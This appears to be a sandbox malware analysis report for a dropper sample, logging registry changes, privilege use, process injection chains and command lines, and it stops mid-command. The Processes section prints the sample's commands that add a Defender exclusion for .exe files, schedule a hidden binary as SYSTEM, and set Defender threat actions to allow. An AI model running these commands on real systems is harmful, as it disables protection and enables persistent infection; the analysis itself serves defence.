Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 648 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3416 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 4468 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2388 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3416 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3872 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1200 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1200 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1200 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4100 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4100 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 4100 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2500 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2500 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 2500 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1304 wrote to memory of 1260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe

.\Install.exe /PdidDDD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe\" 1V /VRsite_idOvc 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe 1V /VRsite_idOvc 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 